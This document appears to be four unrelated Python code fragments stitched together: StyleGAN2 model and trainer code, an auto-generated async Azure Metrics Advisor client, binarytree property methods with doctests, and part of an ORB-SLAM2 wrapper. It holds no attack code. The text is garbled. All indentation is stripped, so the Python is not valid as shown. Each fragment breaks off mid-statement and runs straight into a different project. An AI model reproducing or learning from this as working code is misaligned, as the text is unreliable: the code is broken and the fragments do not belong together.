def forward(self, styles, input_noise):
batch_size = styles.shape[0]
image_size = self.image_size
if self.no_const:
avg_style = styles.mean(dim=1)[:, :, None, None]
x = self.to_initial_block(avg_style)
else:
x = self.initial_block.expand(batch_size, -1, -1, -1)
rgb = None
styles = styles.transpose(0, 1)
x = self.initial_conv(x)
for style, block, attn in zip(styles, self.blocks, self.attns):
if exists(attn):
x = attn(x)
x, rgb = block(x, rgb, style, input_noise)
return rgb
class Discriminator(nn.Module):
def __init__(self, image_size, network_capacity = 16, fq_layers = [], fq_dict_size = 256, attn_layers = [], transparent = False, fmap_max = 512):
super().__init__()
num_layers = int(log2(image_size) - 1)
num_init_filters = 3 if not transparent else 4
blocks = []
filters = [num_init_filters] + [(network_capacity * 4) * (2 ** i) for i in range(num_layers + 1)]
set_fmap_max = partial(min, fmap_max)
filters = list(map(set_fmap_max, filters))
chan_in_out = list(zip(filters[:-1], filters[1:]))
blocks = []
attn_blocks = []
quantize_blocks = []
for ind, (in_chan, out_chan) in enumerate(chan_in_out):
num_layer = ind + 1
is_not_last = ind != (len(chan_in_out) - 1)
block = DiscriminatorBlock(in_chan, out_chan, downsample = is_not_last)
blocks.append(block)
attn_fn = attn_and_ff(out_chan) if num_layer in attn_layers else None
attn_blocks.append(attn_fn)
quantize_fn = PermuteToFrom(VectorQuantize(out_chan, fq_dict_size)) if num_layer in fq_layers else None
quantize_blocks.append(quantize_fn)
self.blocks = nn.ModuleList(blocks)
self.attn_blocks = nn.ModuleList(attn_blocks)
self.quantize_blocks = nn.ModuleList(quantize_blocks)
chan_last = filters[-1]
latent_dim = 2 * 2 * chan_last
self.final_conv = nn.Conv2d(chan_last, chan_last, 3, padding=1)
self.flatten = Flatten()
self.to_logit = nn.Linear(latent_dim, 1)
def forward(self, x):
b, *_ = x.shape
quantize_loss = torch.zeros(1).to(x)
for (block, attn_block, q_block) in zip(self.blocks, self.attn_blocks, self.quantize_blocks):
x = block(x)
if exists(attn_block):
x = attn_block(x)
if exists(q_block):
x, _, loss = q_block(x)
quantize_loss += loss
x = self.final_conv(x)
x = self.flatten(x)
x = self.to_logit(x)
return x.squeeze(), quantize_loss
class StyleGAN2(nn.Module):
def __init__(self, image_size, latent_dim = 512, fmap_max = 512, style_depth = 8, network_capacity = 16, transparent = False, fp16 = False, cl_reg = False, steps = 1, lr = 1e-4, ttur_mult = 2, fq_layers = [], fq_dict_size = 256, attn_layers = [], no_const = False, lr_mlp = 0.1, rank = 0):
super().__init__()
self.lr = lr
self.steps = steps
self.ema_updater = EMA(0.995)
self.S = StyleVectorizer(latent_dim, style_depth, lr_mul = lr_mlp)
self.G = Generator(image_size, latent_dim, network_capacity, transparent = transparent, attn_layers = attn_layers, no_const = no_const, fmap_max = fmap_max)
self.D = Discriminator(image_size, network_capacity, fq_layers = fq_layers, fq_dict_size = fq_dict_size, attn_layers = attn_layers, transparent = transparent, fmap_max = fmap_max)
self.SE = StyleVectorizer(latent_dim, style_depth, lr_mul = lr_mlp)
self.GE = Generator(image_size, latent_dim, network_capacity, transparent = transparent, attn_layers = attn_layers, no_const = no_const)
self.D_cl = None
if cl_reg:
from contrastive_learner import ContrastiveLearner
# experimental contrastive loss discriminator regularization
assert not transparent, 'contrastive loss regularization does not work with transparent images yet'
self.D_cl = ContrastiveLearner(self.D, image_size, hidden_layer='flatten')
# wrapper for augmenting all images going into the discriminator
self.D_aug = AugWrapper(self.D, image_size)
# turn off grad for exponential moving averages
set_requires_grad(self.SE, False)
set_requires_grad(self.GE, False)
# init optimizers
generator_params = list(self.G.parameters()) + list(self.S.parameters())
self.G_opt = Adam(generator_params, lr = self.lr, betas=(0.5, 0.9))
self.D_opt = Adam(self.D.parameters(), lr = self.lr * ttur_mult, betas=(0.5, 0.9))
# init weights
self._init_weights()
self.reset_parameter_averaging()
self.cuda(rank)
# startup apex mixed precision
self.fp16 = fp16
if fp16:
(self.S, self.G, self.D, self.SE, self.GE), (self.G_opt, self.D_opt) = amp.initialize([self.S, self.G, self.D, self.SE, self.GE], [self.G_opt, self.D_opt], opt_level='O1', num_losses=3)
def _init_weights(self):
for m in self.modules():
if type(m) in {nn.Conv2d, nn.Linear}:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in', nonlinearity='leaky_relu')
for block in self.G.blocks:
nn.init.zeros_(block.to_noise1.weight)
nn.init.zeros_(block.to_noise2.weight)
nn.init.zeros_(block.to_noise1.bias)
nn.init.zeros_(block.to_noise2.bias)
def EMA(self):
def update_moving_average(ma_model, current_model):
for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()):
old_weight, up_weight = ma_params.data, current_params.data
ma_params.data = self.ema_updater.update_average(old_weight, up_weight)
update_moving_average(self.SE, self.S)
update_moving_average(self.GE, self.G)
def reset_parameter_averaging(self):
self.SE.load_state_dict(self.S.state_dict())
self.GE.load_state_dict(self.G.state_dict())
def forward(self, x):
return x
class Trainer():
def __init__(
self,
name = 'default',
results_dir = 'results',
models_dir = 'models',
base_dir = './',
image_size = 128,
network_capacity = 16,
fmap_max = 512,
transparent = False,
batch_size = 4,
mixed_prob = 0.9,
gradient_accumulate_every=1,
lr = 2e-4,
lr_mlp = 0.1,
ttur_mult = 2,
rel_disc_loss = False,
num_workers = None,
save_every = 1000,
evaluate_every = 1000,
num_image_tiles = 8,
trunc_psi = 0.6,
fp16 = False,
cl_reg = False,
no_pl_reg = False,
fq_layers = [],
fq_dict_size = 256,
attn_layers = [],
no_const = False,
aug_prob = 0.,
aug_types = ['translation', 'cutout'],
top_k_training = False,
generator_top_k_gamma = 0.99,
generator_top_k_frac = 0.5,
dual_contrast_loss = False,
dataset_aug_prob = 0.,
calculate_fid_every = None,
calculate_fid_num_images = 12800,
clear_fid_cache = False,
is_ddp = False,
rank | |
The query time range.
:type body: ~azure.ai.metricsadvisor.models.IngestionStatusQueryOptions
:param skip: for paging, skipped number.
:type skip: int
:param maxpagesize: the maximum number of items in one page.
:type maxpagesize: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IngestionStatusList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.IngestionStatusList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IngestionStatusList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_data_feed_ingestion_status.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int')
if maxpagesize is not None:
query_parameters['$maxpagesize'] = self._serialize.query("maxpagesize", maxpagesize, 'int')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionStatusQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = '{nextLink}' # FIXME: manually edited; was '/{nextLink}'
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionStatusQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('IngestionStatusList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_data_feed_ingestion_status.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionStatus/query'} # type: ignore
async def reset_data_feed_ingestion_status(
self,
data_feed_id: str,
body: "_models.IngestionProgressResetOptions",
**kwargs: Any
) -> None:
"""Reset data ingestion status by data feed to backfill data.
Reset data ingestion status by data feed to backfill data.
:param data_feed_id: The data feed unique id.
:type data_feed_id: str
:param body: The backfill time range.
:type body: ~azure.ai.metricsadvisor.models.IngestionProgressResetOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reset_data_feed_ingestion_status.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'IngestionProgressResetOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
reset_data_feed_ingestion_status.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionProgress/reset'} # type: ignore
async def get_ingestion_progress(
self,
data_feed_id: str,
**kwargs: Any
) -> "_models.DataFeedIngestionProgress":
"""Get data last success ingestion job timestamp by data feed.
Get data last success ingestion job timestamp by data feed.
:param data_feed_id: The data feed unique id.
:type data_feed_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DataFeedIngestionProgress, or the result of cls(response)
:rtype: ~azure.ai.metricsadvisor.models.DataFeedIngestionProgress
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DataFeedIngestionProgress"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_ingestion_progress.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'dataFeedId': self._serialize.url("data_feed_id", data_feed_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DataFeedIngestionProgress', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ingestion_progress.metadata = {'url': '/dataFeeds/{dataFeedId}/ingestionProgress'} # type: ignore
def get_metric_data(
self,
metric_id: str,
body: "_models.MetricDataQueryOptions",
**kwargs: Any
) -> AsyncIterable["_models.MetricDataList"]:
"""Get time series data from metric.
Get time series data from metric.
:param metric_id: metric unique id.
:type metric_id: str
:param body: query time series data condition.
:type body: ~azure.ai.metricsadvisor.models.MetricDataQueryOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricDataList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.MetricDataList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricDataList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_metric_data.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricDataQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricDataQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.get(url, query_parameters, header_parameters, **body_content_kwargs)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('MetricDataList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorCode, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_metric_data.metadata = {'url': '/metrics/{metricId}/data/query'} # type: ignore
def get_metric_series(
self,
metric_id: str,
body: "_models.MetricSeriesQueryOptions",
skip: Optional[int] = None,
maxpagesize: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.MetricSeriesList"]:
"""List series (dimension combinations) from metric.
List series (dimension combinations) from metric.
:param metric_id: metric unique id.
:type metric_id: str
:param body: filter to query series.
:type body: ~azure.ai.metricsadvisor.models.MetricSeriesQueryOptions
:param skip: for paging, skipped number.
:type skip: int
:param maxpagesize: the maximum number of items in one page.
:type maxpagesize: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricSeriesList or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.ai.metricsadvisor.models.MetricSeriesList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricSeriesList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_metric_series.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'metricId': self._serialize.url("metric_id", metric_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int')
if maxpagesize is not None:
query_parameters['$maxpagesize'] = self._serialize.query("maxpagesize", maxpagesize, 'int')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MetricSeriesQueryOptions')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = '{nextLink}' # FIXME: manually edited; was '/{nextLink}'
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
| |
bool:
"""Check if the binary tree is strict.
A binary tree is strict if all its non-leaf nodes have both the left
and right child nodes.
:return: True if the binary tree is strict, False otherwise.
:rtype: bool
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.is_strict
True
"""
return _get_tree_properties(self).is_strict
@property
def is_complete(self) -> bool:
"""Check if the binary tree is complete.
A binary tree is complete if it meets the following criteria:
* All levels except possibly the last are completely filled.
* Last level is left-justified.
:return: True if the binary tree is complete, False otherwise.
:rtype: bool
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.is_complete
True
"""
return _get_tree_properties(self).is_complete
@property
def min_node_value(self) -> NodeValue:
"""Return the minimum node value of the binary tree.
:return: Minimum node value.
:rtype: float | int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>>
>>> root.min_node_value
1
"""
return _get_tree_properties(self).min_node_value
@property
def max_node_value(self) -> NodeValue:
"""Return the maximum node value of the binary tree.
:return: Maximum node value.
:rtype: float | int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>>
>>> root.max_node_value
3
"""
return _get_tree_properties(self).max_node_value
@property
def max_leaf_depth(self) -> int:
"""Return the maximum leaf node depth of the binary tree.
:return: Maximum leaf node depth.
:rtype: int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.right.left = Node(4)
>>> root.right.left.left = Node(5)
>>>
>>> print(root)
<BLANKLINE>
1____
/ \\
2 3
/
4
/
5
<BLANKLINE>
>>> root.max_leaf_depth
3
"""
return _get_tree_properties(self).max_leaf_depth
@property
def min_leaf_depth(self) -> int:
"""Return the minimum leaf node depth of the binary tree.
:return: Minimum leaf node depth.
:rtype: int
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.right.left = Node(4)
>>> root.right.left.left = Node(5)
>>>
>>> print(root)
<BLANKLINE>
1____
/ \\
2 3
/
4
/
5
<BLANKLINE>
>>> root.min_leaf_depth
1
"""
return _get_tree_properties(self).min_leaf_depth
@property
def properties(self) -> Dict[str, Any]:
"""Return various properties of the binary tree.
:return: Binary tree properties.
:rtype: dict
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>> props = root.properties
>>>
>>> props['height'] # equivalent to root.height
2
>>> props['size'] # equivalent to root.size
5
>>> props['max_leaf_depth'] # equivalent to root.max_leaf_depth
2
>>> props['min_leaf_depth'] # equivalent to root.min_leaf_depth
1
>>> props['max_node_value'] # equivalent to root.max_node_value
5
>>> props['min_node_value'] # equivalent to root.min_node_value
1
>>> props['leaf_count'] # equivalent to root.leaf_count
3
>>> props['is_balanced'] # equivalent to root.is_balanced
True
>>> props['is_bst'] # equivalent to root.is_bst
False
>>> props['is_complete'] # equivalent to root.is_complete
True
>>> props['is_symmetric'] # equivalent to root.is_symmetric
False
>>> props['is_max_heap'] # equivalent to root.is_max_heap
False
>>> props['is_min_heap'] # equivalent to root.is_min_heap
True
>>> props['is_perfect'] # equivalent to root.is_perfect
False
>>> props['is_strict'] # equivalent to root.is_strict
True
"""
properties = _get_tree_properties(self).__dict__.copy()
properties["is_balanced"] = _is_balanced(self) >= 0
properties["is_bst"] = _is_bst(self)
properties["is_symmetric"] = _is_symmetric(self)
return properties
@property
def inorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using in-order_ traversal.
An in-order_ traversal visits left subtree, root, then right subtree.
.. _in-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.inorder
[Node(4), Node(2), Node(5), Node(1), Node(3)]
"""
result: List[Node] = []
stack: List[Node] = []
node: Optional[Node] = self
while node or stack:
while node:
stack.append(node)
node = node.left
if stack:
node = stack.pop()
result.append(node)
node = node.right
return result
@property
def preorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using pre-order_ traversal.
A pre-order_ traversal visits root, left subtree, then right subtree.
.. _pre-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.preorder
[Node(1), Node(2), Node(4), Node(5), Node(3)]
"""
result: List[Node] = []
stack: List[Optional[Node]] = [self]
while stack:
node = stack.pop()
if node:
result.append(node)
stack.append(node.right)
stack.append(node.left)
return result
@property
def postorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using post-order_ traversal.
A post-order_ traversal visits left subtree, right subtree, then root.
.. _post-order: https://en.wikipedia.org/wiki/Tree_traversal
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.postorder
[Node(4), Node(5), Node(2), Node(3), Node(1)]
"""
result: List[Node] = []
stack: List[Optional[Node]] = [self]
while stack:
node = stack.pop()
if node:
result.append(node)
stack.append(node.left)
stack.append(node.right)
return result[::-1]
@property
def levelorder(self) -> List["Node"]:
"""Return the nodes in the binary tree using level-order_ traversal.
A level-order_ traversal visits nodes left to right, level by level.
.. _level-order:
https://en.wikipedia.org/wiki/Tree_traversal#Breadth-first_search
:return: List of nodes.
:rtype: [binarytree.Node]
**Example**:
.. doctest::
>>> from binarytree import Node
>>>
>>> root = Node(1)
>>> root.left = Node(2)
>>> root.right = Node(3)
>>> root.left.left = Node(4)
>>> root.left.right = Node(5)
>>>
>>> print(root)
<BLANKLINE>
__1
/ \\
2 3
/ \\
4 5
<BLANKLINE>
>>> root.levelorder
[Node(1), Node(2), Node(3), Node(4), Node(5)]
"""
current_nodes = [self]
result = []
while len(current_nodes) > 0:
next_nodes = []
for node in current_nodes:
result.append(node)
if node.left is not None:
next_nodes.append(node.left)
if node.right is not None:
next_nodes.append(node.right)
current_nodes = next_nodes
return result
def _is_balanced(root: Optional[Node]) -> int:
"""Return the tree height + 1 if balanced, -1 otherwise.
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: Height if the binary tree is balanced, -1 otherwise.
:rtype: int
"""
if root is None:
return 0
left = _is_balanced(root.left)
if left < 0:
return -1
right = _is_balanced(root.right)
if right < 0:
return -1
return -1 if abs(left - right) > 1 else max(left, right) + 1
def _is_bst(root: Optional[Node]) -> bool:
"""Check if the binary tree is a BST (binary search tree).
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: True if the binary tree is a BST, False otherwise.
:rtype: bool
"""
stack: List[Node] = []
cur = root
pre = None
while stack or cur is not None:
if cur is not None:
stack.append(cur)
cur = cur.left
else:
node = stack.pop()
if pre is not None and node.val <= pre.val:
return False
pre = node
cur = node.right
return True
def _is_symmetric(root: Optional[Node]) -> bool:
"""Check if the binary tree is symmetric.
:param root: Root node of the binary tree.
:type root: binarytree.Node | None
:return: True if the binary tree is symmetric, False otherwise.
:rtype: bool
"""
def symmetric_helper(left: Optional[Node], right: Optional[Node]) -> bool:
if left is None and right is None:
return True
if left is None or right | |
rekey_map[subprocess_stamp] is not None
}
# Log the subprocess timestamps that do not appear in our known list
unknown_keys = [
subprocess_stamp for subprocess_stamp in rekey_map.keys()
if rekey_map[subprocess_stamp] is None
]
if len(unknown_keys) > 0:
logging.getLogger(__name__).warning(
"The following timestamps were returned by the subprocess, "
"but do not match any image timstamp known by the parent process: " + str(unknown_keys))
# Merge the data from the subprocess with the partial frame results
for timestamp, frame_stats in frame_statistics.items():
frame_result = self._partial_frame_results[timestamp]
if frame_stats[0] is not None:
frame_result.processing_time = frame_stats[0]
frame_result.num_features = frame_stats[1]
frame_result.num_matches = frame_stats[2]
frame_result.tracking_state = frame_stats[3]
frame_result.loop_edges = list(frame_stats[5])
if frame_stats[4] is not None:
estimated_pose = np.identity(4)
estimated_pose[0:3, :] = frame_stats[4]
frame_result.estimated_pose = make_relative_pose(estimated_pose)
if not all(loop_timestamp in timestamps for loop_timestamp in frame_result.loop_edges):
logging.getLogger(__name__).warning(f"Loop closures for {timestamp} didn't match a known timestamp")
result = SLAMTrialResult(
system=self.pk,
success=len(self._partial_frame_results) > 0,
results=[self._partial_frame_results[timestamp]
for timestamp in sorted(timestamps)],
has_scale=(self.mode != SensorMode.MONOCULAR),
settings={
'in_fx': self._intrinsics.fx,
'in_fy': self._intrinsics.fy,
'in_cx': self._intrinsics.cx,
'in_cy': self._intrinsics.cy,
'in_k1': self._intrinsics.k1,
'in_k2': self._intrinsics.k2,
'in_p1': self._intrinsics.p1,
'in_p2': self._intrinsics.p2,
'in_k3': self._intrinsics.k3,
'in_width': self._intrinsics.width,
'in_height': self._intrinsics.height,
'base': self._stereo_baseline if self._stereo_baseline is not None else float('nan'),
'vocabulary_file': str(self.vocabulary_file),
'mode': str(self.mode.name),
'depth_threshold': self.depth_threshold,
'orb_num_features': self.orb_num_features,
'orb_scale_factor': self.orb_scale_factor,
'orb_num_levels': self.orb_num_levels,
'orb_ini_threshold_fast': self.orb_ini_threshold_fast,
'orb_min_threshold_fast': self.orb_min_threshold_fast
}
)
result.run_time = time.time() - self._start_time
self._partial_frame_results = None
self._start_time = None
return result
@classmethod
def get_instance(
cls,
mode: SensorMode = None,
vocabulary_file: str = None,
vocabulary_branching_factor: int = 10,
vocabulary_depth: int = 6,
vocabulary_seed: int = 0,
depth_threshold: float = 40.0,
orb_num_features: int = 2000,
orb_scale_factor: float = 1.2,
orb_num_levels: int = 8,
orb_ini_threshold_fast: int = 12,
orb_min_threshold_fast: int = 7
) -> 'OrbSlam2':
"""
Get an instance of this vision system, with some parameters, pulling from the database if possible,
or construct a new one if needed.
It is the responsibility of subclasses to ensure that as few instances of each system as possible exist
within the database.
Does not save the returned object, you'll usually want to do that straight away.
Also does not build the Vocabulary. Again, handle that and re-save before using.
:return: An OrbSlam2 instance with the given settings.
"""
if mode is None:
raise ValueError("Cannot search for ORBSLAM without a mode, please specify a sensor mode")
# Look for existing objects with the same settings
query = {
'mode': str(mode.name),
'depth_threshold': float(depth_threshold),
'orb_num_features': int(orb_num_features),
'orb_scale_factor': float(orb_scale_factor),
'orb_num_levels': int(orb_num_levels),
'orb_ini_threshold_fast': int(orb_ini_threshold_fast),
'orb_min_threshold_fast': int(orb_min_threshold_fast)
}
if vocabulary_file is not None and len(vocabulary_file) > 0:
# Only request a specific vocabulary file if one is requested, otherwise leave the parameter free.
query['vocabulary_file'] = str(vocabulary_file)
else:
# No vocabulary file specified, look for a system with the same settings
query['vocabulary_branching_factor'] = int(vocabulary_branching_factor)
query['vocabulary_depth'] = int(vocabulary_depth)
query['vocabulary_seed'] = int(vocabulary_seed)
all_objects = OrbSlam2.objects.raw(query)
if all_objects.count() > 0:
return all_objects.first()
# There isn't an existing system with those settings, make a new one.
obj = cls(
mode=mode,
